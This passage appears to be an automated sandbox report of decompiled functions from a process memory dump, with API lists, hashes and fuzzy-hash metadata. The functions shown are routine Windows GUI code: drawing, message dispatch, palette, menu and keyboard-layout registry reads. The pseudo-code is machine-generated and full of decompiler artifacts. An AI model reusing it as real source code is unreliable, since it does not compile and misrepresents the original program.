E00440210(intOrPtr __eax, void* __ebx, void* __ecx, struct HDC__* __edx, void* __esi, void* __eflags, intOrPtr _a4) { intOrPtr _v8; struct HDC__* _v12; int _v16; struct tagRECT _v32; signed int _t68; intOrPtr _t74; intOrPtr _t81; int _t102; void* _t104; void* _t105; intOrPtr _t119; int _t125; void* _t126; void* _t129; _v12 = __edx; _v8 = __eax; *(_v8 + 0x54) = *(_v8 + 0x54) | 0x00000080; _v16 = SaveDC(_v12); _push(_t129); _push(0x440388); _push( *[fs:edx]); *[fs:edx] = _t129 + 0xffffffe4; E00439028(_v12, _a4, __ecx); IntersectClipRect(_v12, 0, 0, *(_v8 + 0x48), *(_v8 + 0x4c)); _t102 = 0; _t125 = 0; if((GetWindowLongA(E004423F8(_v8), 0xffffffec) & 0x00000002) == 0) { _t68 = GetWindowLongA(E004423F8(_v8), 0xfffffff0); __eflags = _t68 & 0x00800000; if((_t68 & 0x00800000) != 0) { _t125 = 3; _t102 = 0xa00f; } } else { _t125 = 0xa; _t102 = 0x200f; } if(_t102 != 0) { SetRect( &_v32, 0, 0, *(_v8 + 0x48), *(_v8 + 0x4c)); DrawEdge(_v12, &_v32, _t125, _t102); E00439028(_v12, _v32.top, _v32.left); IntersectClipRect(_v12, 0, 0, _v32.right - _v32.left, _v32.bottom - _v32.top); } E0043BC9C(_v8, _v12, 0x14, 0); E0043BC9C(_v8, _v12, 0xf, 0); _t74 = *((intOrPtr*)(_v8 + 0x1d0)); if(_t74 == 0) { L12: _pop(_t119); *[fs:eax] = _t119; _push(0x44038f); return RestoreDC(_v12, _v16); } else { _t104 = *((intOrPtr*)(_t74 + 8)) - 1; if(_t104 < 0) { goto L12; } _t105 = _t104 + 1; _t126 = 0; do { _t81 = E0041A80C( *((intOrPtr*)(_v8 + 0x1d0)), _t126); _t138 = *((char*)(_t81 + 0x57)); if( *((char*)(_t81 + 0x57)) != 0) { E00440210(_t81, _t105, *((intOrPtr*)(_t81 + 0x40)), _v12, _t126, _t138, *((intOrPtr*)(_t81 + 0x44))); } _t126 = _t126 + 1; _t105 = _t105 - 1; } while (_t105 != 0); goto L12; } } 0x0044021a 0x0044021d 0x00440223 0x00440232 0x00440237 0x00440238 0x0044023d 0x00440240 0x0044024b 0x00440266 0x0044026b 0x0044026d 0x00440282 0x0044029b 0x004402a0 0x004402a5 0x004402a7 0x004402ac 0x004402ac 0x00440284 0x00440284 0x00440289 0x00440289 0x004402b3 0x004402cb 0x004402da 0x004402e8 0x00440303 0x00440303 0x00440315 0x00440327 0x0044032f 0x00440337 0x0044036d 0x0044036f 0x00440372 0x00440375 0x00440387 0x00440339 0x0044033c 0x0044033f 0x00000000 0x00000000 0x00440341 0x00440342 0x00440344 0x0044034f 0x00440354 0x00440358 0x00440364 0x00440364 0x00440369 0x0044036a 0x0044036a 0x00000000 0x00440344

APIs

SaveDC.GDI32(?), ref: 0044022D Part of subcall function 00439028: GetWindowOrgEx.GDI32(00000000), ref: 00439036 Part of subcall function 00439028: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0043904C IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440266 GetWindowLongA.USER32 ref: 0044027A GetWindowLongA.USER32 ref: 0044029B SetRect.USER32 ref: 004402CB DrawEdge.USER32(?,?,00000000,00000000), ref: 004402DA IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00440303 RestoreDC.GDI32(?,?), ref: 00440382

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave String ID: API String ID: 2976466617-0 Opcode ID: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01 Instruction ID: 4aa519c723c9a553b380c3e93beb146f7b5c6051756f74ab7ed9f7139ab4c4a9 Opcode Fuzzy Hash: 4840986328c7cd9c4a77fec9c8fe1af57394d4554ee4a78261ce9734ac6bca01 Instruction Fuzzy Hash: D341FC75A00208AFEB10DFD9C985F9EB7F9EF48304F1141A5BA04EB391D678AE41CB54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00456A5C(void* __eax, struct HWND__** __edx) { long _v20; intOrPtr _t17; intOrPtr _t30; void* _t46; void* _t50; struct HWND__** _t51; struct HWND__* _t52; struct HWND__* _t53; void* _t54; DWORD* _t55; _t55 = _t54 + 0xfffffff8; _t51 = __edx; _t50 = __eax; _t46 = 0; _t17 = *((intOrPtr*)(__edx + 4)); if(_t17 < 0x100 || _t17 > 0x109) { L19: return _t46; } else { _t52 = GetCapture(); if(_t52 != 0) { GetWindowThreadProcessId(_t52, _t55); _t11 = _t50 + 0x30; // 0x0 GetWindowThreadProcessId( *_t11, &_v20); if( *_t55 == _v20 && SendMessageA(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { _t46 = 1; } goto L19; } _t53 = *_t51; _t2 = _t50 + 0x44; // 0x0 _t30 = *_t2; if(_t30 == 0 || _t53 != *((intOrPtr*)(_t30 + 0x29c))) { L7: if(E004374D8(_t53) == 0 && _t53 != 0) { _t53 = GetParent(_t53); goto L7; } if(_t53 == 0) { _t53 = *_t51; } goto L11; } else { _t53 = E004423F8(_t30); L11: if(IsWindowUnicode(_t53) == 0) { if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { _t46 = 1; } } else { if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) { _t46 = 1; } } goto L19; } } } 0x00456a60 0x00456a63 0x00456a65 0x00456a67 0x00456a69 0x00456a71 0x00456b47 0x00456b4f 0x00456a82 0x00456a87 0x00456a8b 0x00456b0e 0x00456b18 0x00456b1c 0x00456b28 0x00456b45 0x00456b45 0x00000000 0x00456b28 0x00456a8d 0x00456a8f 0x00456a8f 0x00456a94 0x00456aaf 0x00456ab8 0x00456aad 0x00000000 0x00456aad 0x00456ac0 0x00456ac2 0x00456ac2 0x00000000 0x00456a9e 0x00456aa3 0x00456ac4 0x00456acc 0x00456b06 0x00456b08 0x00456b08 0x00456ace 0x00456ae7 0x00456ae9 0x00456ae9 0x00456ae7 0x00000000 0x00456acc 0x00456a94

APIs

GetCapture.USER32 ref: 00456A82 IsWindowUnicode.USER32(00000000), ref: 00456AC5 SendMessageW.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AE0 SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456AFF GetWindowThreadProcessId.USER32(00000000), ref: 00456B0E GetWindowThreadProcessId.USER32(00000000,?), ref: 00456B1C SendMessageA.USER32(00000000,-0000BBEE,00460C02,?), ref: 00456B3C

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode String ID: API String ID: 1994056952-0 Opcode ID: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55 Instruction ID: cf72f3f59c931989ad5c2206f26d5bdc5f1bc31332a3f3f8568b50df8a80e80a Opcode Fuzzy Hash: 988f28035e725d6b90499869a6500e627582e695e9a65bec0a14398d4c93cf55 Instruction Fuzzy Hash: 3E219EB12042486FD620EA69C940F67B3DC9F09316B52843AFE59D3783DB28FC04C729

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E0042715C(void* __ebx) { struct HDC__* _v8; struct tagPALETTEENTRY _v1000; struct tagPALETTEENTRY _v1004; struct tagPALETTEENTRY _v1032; signed int _v1034; short _v1036; void* _t24; int _t52; intOrPtr _t59; void* _t61; void* _t62; _t61 = _t62; _push(__ebx); _v1036 = 0x300; _v1034 = 0x10; E00402EFC(_t24, __ebx, 0x40, &_v1032); _v8 = GetDC(0); _push(_t61); _push(0x427259); _push( *[fs:eax]); *[fs:eax] = _t62 + 0xfffffbf8; _t52 = GetDeviceCaps(_v8, 0x68); if(_t52 >= 0x10) { GetSystemPaletteEntries(_v8, 0, 8, &_v1032); if(_v1004 != 0xc0c0c0) { GetSystemPaletteEntries(_v8, _t52 - 8, 8, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x424); } else { GetSystemPaletteEntries(_v8, _t52 - 8, 1, &_v1004); GetSystemPaletteEntries(_v8, _t52 - 7, 7, _t61 + (_v1034 & 0x0000ffff) * 4 - 0x420); GetSystemPaletteEntries(_v8, 7, 1, &_v1000); } } _pop(_t59); *[fs:eax] = _t59; _push(0x427260); return ReleaseDC(0, _v8); } 0x0042715d 0x00427165 0x00427166 0x0042716f 0x00427183 0x0042718f 0x00427194 0x00427195 0x0042719a 0x0042719d 0x004271ab 0x004271b0 0x004271c5 0x004271d4 0x0042723b 0x004271d6 0x004271e9 0x00427207 0x0042721b 0x0042721b 0x004271d4 0x00427242 0x00427245 0x00427248 0x00427258

APIs

GetDC.USER32(00000000), ref: 0042718A GetDeviceCaps.GDI32(?,00000068), ref: 004271A6 GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 004271C5 GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 004271E9 GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 00427207 GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042721B GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042723B ReleaseDC.USER32 ref: 00427253

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: EntriesPaletteSystem$CapsDeviceRelease String ID: API String ID: 1781840570-0 Opcode ID: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862 Instruction ID: ce3a1c45e00d95f86b6b4c0876be039325c7f876ce5768e959d2bcb4caf90edf Opcode Fuzzy Hash: e91d54244fb84fac95d03ed3f74244df58bb9bf0f4995b59ae57cf6a99570862 Instruction Fuzzy Hash: A121A6B1A44218EAEB10DBA5CD81FAE73ECEB08704F5104AAF705F71C1D6799E509B38

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E0045057C(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; void* _t46; void* _t66; void* _t73; struct HMENU__* _t76; struct HMENU__* _t82; intOrPtr _t89; void* _t91; intOrPtr _t93; intOrPtr _t95; intOrPtr _t99; void* _t104; intOrPtr _t112; void* _t127; intOrPtr _t129; void* _t132; _v20 = 0; _t129 = __edx; _t104 = __eax; _push(_t132); _push(0x450790); _push( *[fs:eax]); *[fs:eax] = _t132 + 0xfffffff0; if(__edx == 0) { L7: _t44 = *((intOrPtr*)(_t104 + 0x290)); if( *((intOrPtr*)(_t104 + 0x290)) != 0) { E00433BC8(_t44, 0, 0); } if(( *(_t104 + 0x1c) & 0x00000008) != 0 || _t129 != 0 && ( *(_t129 + 0x1c) & 0x00000008) != 0) { _t129 = 0; } *((intOrPtr*)(_t104 + 0x290)) = _t129; if(_t129 != 0) { E00420738(_t129, _t104); } if(_t129 == 0 || ( *(_t104 + 0x1c) & 0x00000010) == 0 && *((char*)(_t104 + 0x271)) == 3) { _t46 = E004426F4(_t104); __eflags = _t46; if(_t46 != 0) { SetMenu(E004423F8(_t104), 0); } goto L30; } else { if( *((char*)( *((intOrPtr*)(_t104 + 0x290)) + 0x5c)) != 0 || *((char*)(_t104 + 0x277)) == 1) { if(( *(_t104 + 0x1c) & 0x00000010) == 0) { __eflags = *((char*)(_t104 + 0x277)) - 1; if( *((char*)(_t104 + 0x277)) != 1) { _t66 = E004426F4(_t104); __eflags = _t66; if(_t66 != 0) { SetMenu(E004423F8(_t104), 0); } } goto L30; } goto L21; } else { L21: if(E004426F4(_t104) != 0) { _t73 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))(); _t76 = GetMenu(E004423F8(_t104)); _t154 = _t73 - _t76; if(_t73 != _t76) { _t82 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x290)))) + 0x34))(); SetMenu(E004423F8(_t104), _t82); } E00433BC8(_t129, E004423F8(_t104), _t154); } L30: if( *((char*)(_t104 + 0x276)) != 0) { E00451B54(_t104, 1); } E004504B4(_t104); if( *((intOrPtr*)(_t104 + 0x298)) != 0 && ( *(_t104 + 0x1c) & 0x00000010) != 0 && *((intOrPtr*)(_t104 + 0x30)) != 0) { SetWindowPos(E004423F8(_t104), 0, 0, 0, 0, 0, 0x37); E0043BC9C(_t104, 0, 0x85, 0); E0043BC9C(_t104, 0, 0xf, 0); } _pop(_t112); *[fs:eax] = _t112; _push(0x450797); return E0040473C( &_v20); } } } _t89 = *0x466584; // 0x27c66a0 _t91 = E00454684(_t89) - 1; if(_t91 >= 0) { _v8 = _t91 + 1; _t127 = 0; do { _t93 = *0x466584; // 0x27c66a0 if(_t129 == *((intOrPtr*)(E00454670(_t93, _t127) + 0x290))) { _t95 = *0x466584; // 0x27c66a0 if(_t104 != E00454670(_t95, _t127)) { _v16 = *((intOrPtr*)(_t129 + 8)); _v12 = 0xb; _t99 = *0x462bbc; // 0x423728 E00406740(_t99, &_v20); E0040C158(_t104, _v20, 1, _t127, _t129, 0, &_v16); E00404184(); } } _t127 = _t127 + 1; _t10 = &_v8; *_t10 = _v8 - 1; } while ( *_t10 != 0); } } 0x00450587 0x0045058a 0x0045058c 0x00450590 0x00450591 0x00450596 0x00450599 0x0045059e 0x00450610 0x00450610 0x00450618 0x0045061c 0x0045061c 0x00450625 0x00450631 0x00450631 0x00450633 0x0045063b 0x00450641 0x00450641 0x00450648 0x004506fb 0x00450700 0x00450702 0x0045070e 0x0045070e 0x00000000 0x00450661 0x0045066b 0x0045067a 0x004506d4 0x004506db 0x004506df 0x004506e4 0x004506e6 0x004506f2 0x004506f2 0x004506e6 0x00000000 0x004506db 0x00000000 0x0045067c 0x0045067c 0x00450685 0x00450693 0x004506a0 0x004506a5 0x004506a7 0x004506b1 0x004506bd 0x004506bd 0x004506cd 0x004506cd 0x00450713 0x0045071a 0x00450720 0x00450720 0x00450727 0x00450733 0x00450755 0x00450765 0x00450775 0x00450775 0x0045077c 0x0045077f 0x00450782 0x0045078f 0x0045078f 0x0045066b 0x00450648 0x004505a0 0x004505aa 0x004505ad 0x004505b0 0x004505b3 0x004505b5 0x004505b7 0x004505c7 0x004505cb 0x004505d7 0x004505dc 0x004505df 0x004505ec 0x004505f1 0x00450600 0x00450605 0x00450605 0x004505d7 0x0045060a 0x0045060b 0x0045060b 0x0045060b 0x004505b5

APIs

GetMenu.USER32(00000000), ref: 004506A0 SetMenu.USER32(00000000,00000000), ref: 004506BD SetMenu.USER32(00000000,00000000), ref: 004506F2 SetMenu.USER32(00000000,00000000,00000000,00450790), ref: 0045070E Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772 SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 00450755

Strings

(7B , xrefs: 004505EC

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadStringWindow String ID: (7B API String ID: 1738039741-3251261122 Opcode ID: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc Instruction ID: 391e45c69739de599930f1571a303692f4f31b01482e4dca29fa4868e8c2a8c8 Opcode Fuzzy Hash: 0ccf8dde2134a50e6ee81cdb3be7b335862480176179d592b1f0e745e2d916bc Instruction Fuzzy Hash: F151AE34A043445BEB24EF39998675B2694AB8430AF0544BFFC059B397CABCDC498B99

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E00443BBC(intOrPtr* __eax, void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr* _v8; void _v12; intOrPtr _v16; int _v24; int _v28; intOrPtr _v32; char _v36; signed int _t81; intOrPtr* _t82; intOrPtr _t93; signed int _t107; signed int _t120; signed char _t121; intOrPtr _t138; intOrPtr _t147; void* _t150; asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t120 = __ecx; _v8 = __eax; _t147 = *0x462f14; // 0x466584 *((char*)(_v8 + 0x258)) = 1; _push(_t150); _push(0x443da0); _push( *[fs:edx]); *[fs:edx] = _t150 + 0xffffffe0; E0043AA4C(_v8, __ecx, __ecx, _t147); _v16 = _v16 + 4; E0043BD44(_v8, &_v28); if(E00454628() < *(_v8 + 0x4c) + _v24) { _v24 = E00454628() - *(_v8 + 0x4c); } if(E00454634() < *(_v8 + 0x48) + _v28) { _v28 = E00454634() - *(_v8 + 0x48); } if(E0045461C() > _v28) { _v28 = E0045461C(); } if(E00454610() > _v16) { _v16 = E00454610(); } SetWindowPos(E004423F8(_v8), 0xffffffff, _v28, _v24, *(_v8 + 0x48), *(_v8 + 0x4c), 0x10); if(GetTickCount() - *((intOrPtr*)(_v8 + 0x25c)) <= 0xfa) { _t81 = 0; } else { _t107 = _t120; if(_t107 != 0) { _t107 = *(_t107 - 4); } _t81 = _t107 & 0xffffff00 | _t107 - 0x00000064 < 0x00000000; } if(_t81 != 0 && *0x46255c != 0) { SystemParametersInfoA(0x1016, 0, &_v12, 0); if(_v12 != 0) { SystemParametersInfoA(0x1018, 0, &_v12, 0); if(_v12 == 0) { E0044737C( &_v36); if(_v32 <= _v24) { _t121 = 1; } else { _t121 = 0; } } else { _t121 = 2; } *0x46255c(E004423F8(_v8), 0x64, *(0x462664 + (_t121 & 0x000000ff) * 4) | 0x00040000); } } _t82 = *0x462da4; // 0x466580 E0043F308(_v8, *((intOrPtr*)( *_t82 + 0x30))); ShowWindow(E004423F8(_v8), 4); *((intOrPtr*)( *_v8 + 0x80))(); _pop(_t138); *[fs:eax] = _t138; _push(0x443da7); *((intOrPtr*)(_v8 + 0x25c)) = GetTickCount(); _t93 = _v8; *((char*)(_t93 + 0x258)) = 0; return _t93; } 0x00443bca 0x00443bcb 0x00443bcc 0x00443bcd 0x00443bce 0x00443bd0 0x00443bd3 0x00443bdc 0x00443be5 0x00443be6 0x00443beb 0x00443bee 0x00443bf6 0x00443bfb 0x00443c05 0x00443c1c 0x00443c2b 0x00443c2b 0x00443c40 0x00443c4f 0x00443c4f 0x00443c5c 0x00443c65 0x00443c65 0x00443c72 0x00443c7b 0x00443c7b 0x00443ca1 0x00443cb9 0x00443cce 0x00443cbb 0x00443cbb 0x00443cbf 0x00443cc4 0x00443cc4 0x00443cc9 0x00443cc9 0x00443cd2 0x00443cea 0x00443cf3 0x00443d02 0x00443d0b 0x00443d19 0x00443d24 0x00443d2a 0x00443d26 0x00443d26 0x00443d26 0x00443d0d 0x00443d0d 0x00443d0d 0x00443d47 0x00443d47 0x00443cf3 0x00443d4d 0x00443d5a 0x00443d6a 0x00443d74 0x00443d7c 0x00443d7f 0x00443d82 0x00443d8f 0x00443d95 0x00443d98 0x00443d9f

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443CA1 GetTickCount.KERNEL32 ref: 00443CA6 SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00443CEA SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00443D02 AnimateWindow.USER32(00000000,00000064,?), ref: 00443D47 ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00443DA0), ref: 00443D6A Part of subcall function 0044737C: GetCursorPos.USER32(?,?,00443D1E,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00447380 GetTickCount.KERNEL32 ref: 00443D87

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow String ID: API String ID: 3024527889-0 Opcode ID: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf Instruction ID: 6ca554415f86ce21c423b390f392124ef01619902e7d0cc64a9ff58f6192d223 Opcode Fuzzy Hash: 0d3a6398bf7448182259ca20921321b585508c4eae7e957dc6a7b0303c0f6ddf Instruction Fuzzy Hash: A4517F70A00105EFEB10DFA9C982A9EB3F5EF45705F2045A6F900EB351D778AE40DB59

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%

E00454878(intOrPtr __eax, void* __ebx, void* __fp0) { intOrPtr _v8; int _v12; void* _v16; char _v20; void* _v24; struct HKL__* _v280; char _v536; char _v600; char _v604; char _v608; char _v612; void* _t60; intOrPtr _t106; intOrPtr _t111; void* _t117; void* _t118; intOrPtr _t119; void* _t129; _t129 = __fp0; _t117 = _t118; _t119 = _t118 + 0xfffffda0; _v612 = 0; _v8 = __eax; _push(_t117); _push(0x454a23); _push( *[fs:eax]); *[fs:eax] = _t119; if( *((intOrPtr*)(_v8 + 0x34)) != 0) { L11: _pop(_t106); *[fs:eax] = _t106; _push(0x454a2a); return E0040473C( &_v612); } else { *((intOrPtr*)(_v8 + 0x34)) = E004038F8(1); E0040473C(_v8 + 0x38); _t60 = GetKeyboardLayoutList(0x40, &_v280) - 1; if(_t60 < 0) { L10: *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x25)) = 0; E0041C564( *((intOrPtr*)(_v8 + 0x34)), 1); goto L11; } else { _v20 = _t60 + 1; _v24 = &_v280; do { if(E00447838( *_v24) == 0) { goto L9; } else { _v608 = *_v24; _v604 = 0; if(RegOpenKeyExA(0x80000002, E0040968C( &_v600, &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019, &_v16) != 0) { goto L9; } else { _push(_t117); _push(0x4549df); _push( *[fs:eax]); *[fs:eax] = _t119; _v12 = 0x100; if(RegQueryValueExA(_v16, "layout text", 0, 0, &_v536, &_v12) == 0) { E004049AC( &_v612, 0x100, &_v536); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))(); if( *_v24 == *((intOrPtr*)(_v8 + 0x3c))) { E004049AC(_v8 + 0x38, 0x100, &_v536); } } _pop(_t111); *[fs:eax] = _t111; _push(0x4549e6); return RegCloseKey(_v16); } } goto L12; L9: _v24 = _v24 + 4; _t38 = &_v20; *_t38 = _v20 - 1; } while ( *_t38 != 0); goto L10; } } L12: } 0x00454878 0x00454879 0x0045487b 0x00454884 0x0045488a 0x0045488f 0x00454890 0x00454895 0x00454898 0x004548a2 0x00454a04 0x00454a0c 0x00454a0f 0x00454a12 0x00454a22 0x004548a8 0x004548b7 0x004548c0 0x004548d3 0x004548d6 0x004549f3 0x004549f9 0x004549ff 0x00000000 0x004548dc 0x004548dd 0x004548e6 0x004548e9 0x004548f5 0x00000000 0x004548fb 0x0045490d 0x00454913 0x0045493d 0x00000000 0x00454943 0x00454945 0x00454946 0x0045494b 0x0045494e 0x00454951 0x00454977 0x0045498a 0x004549a2 0x004549b0 0x004549c3 0x004549c3 0x004549b0 0x004549ca 0x004549cd 0x004549d0 0x004549de 0x004549de 0x0045493d 0x00000000 0x004549e6 0x004549e6 0x004549ea 0x004549ea 0x004549ea 0x00000000 0x004548e9 0x004548d6 0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00454A23,?,027C66A0,?,00454A85,00000000,?,0043D6E3), ref: 004548CE RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454936 RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 00454970 RegCloseKey.ADVAPI32(?,004549E6,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 004549D9

Strings

layout text , xrefs: 00454967 System\CurrentControlSet\Control\Keyboard Layouts\%.8x , xrefs: 00454920

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text API String ID: 1703357764-2652665750 Opcode ID: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62 Instruction ID: 59853e96f857d77ef27d539afe0c0d9e90707fb92448eacf3fe576158862f236 Opcode Fuzzy Hash: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62 Instruction Fuzzy Hash: 42418074A002089FDB10DF65C982BDEB7F4EB88304F5140A6E904EB352D738AE44CF69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E00456C8C(void* __eax, char* __ecx, struct tagMSG* __edx) { char _v19; char _t12; int _t13; void* _t14; int _t30; int _t32; MSG* _t42; void* _t43; char* _t45; _t33 = __ecx; _push(__ecx); _t42 = __edx; _t43 = __eax; _t32 = 0; if(PeekMessageA(__edx, 0, 0, 0, 0) != 0) { *_t45 = _t12; if( *_t45 == 0) { _t13 = PeekMessageA(_t42, 0, 0, 0, 1); asm("sbb eax, eax"); _t14 = _t13 + 1; } else { _t30 = PeekMessageW(_t42, 0, 0, 0, 1); asm("sbb eax, eax"); _t14 = _t30 + 1; } if(_t14 != 0) { _t32 = 1; if(_t42->message == 0x12) { *((char*)(_t43 + 0xa4)) = 1; } else { _v19 = 0; if( *((short*)(_t43 + 0x102)) != 0) { _t33 = &_v19; *((intOrPtr*)(_t43 + 0x100))(); } if(E004586B8(_t43, _t33, _t42) == 0 && E00456B50(_t43, _t42) == 0 && _v19 == 0 && E00456A0C(_t43, _t42) == 0 && E00456A5C(_t43, _t42) == 0 && E004569C4(_t43, _t42) == 0) { TranslateMessage(_t42); if( *_t45 == 0) { DispatchMessageA(_t42); } else { DispatchMessageW(_t42); } } } } } return _t32; } 0x00456c8c 0x00456c90 0x00456c91 0x00456c93 0x00456c95 0x00456ca7 0x00456cc3 0x00456cca 0x00456ceb 0x00456cf3 0x00456cf5 0x00456ccc 0x00456cd5 0x00456cdd 0x00456cdf 0x00456cdf 0x00456cf8 0x00456cfe 0x00456d04 0x00456d8f 0x00456d0a 0x00456d0a 0x00456d17 0x00456d19 0x00456d25 0x00456d25 0x00456d36 0x00456d74 0x00456d7d 0x00456d88 0x00456d7f 0x00456d80 0x00456d80 0x00456d7d 0x00456d36 0x00456d04 0x00456cf8 0x00456d9d

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00456CA0 IsWindowUnicode.USER32 ref: 00456CB4 PeekMessageW.USER32 ref: 00456CD5 PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00456CEB TranslateMessage.USER32 ref: 00456D74 DispatchMessageW.USER32 ref: 00456D80 DispatchMessageA.USER32 ref: 00456D88

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow String ID: API String ID: 2190272339-0 Opcode ID: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999 Instruction ID: 5f7cc9d7226b631bc1ffbd552804f8e8163c3220582b39396143643a60f640cf Opcode Fuzzy Hash: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999 Instruction Fuzzy Hash: 1321D92070438026F6316A254E41B7B97A54F9374AF56481FFD85A73C3DAAEBC8E421E

Uniqueness

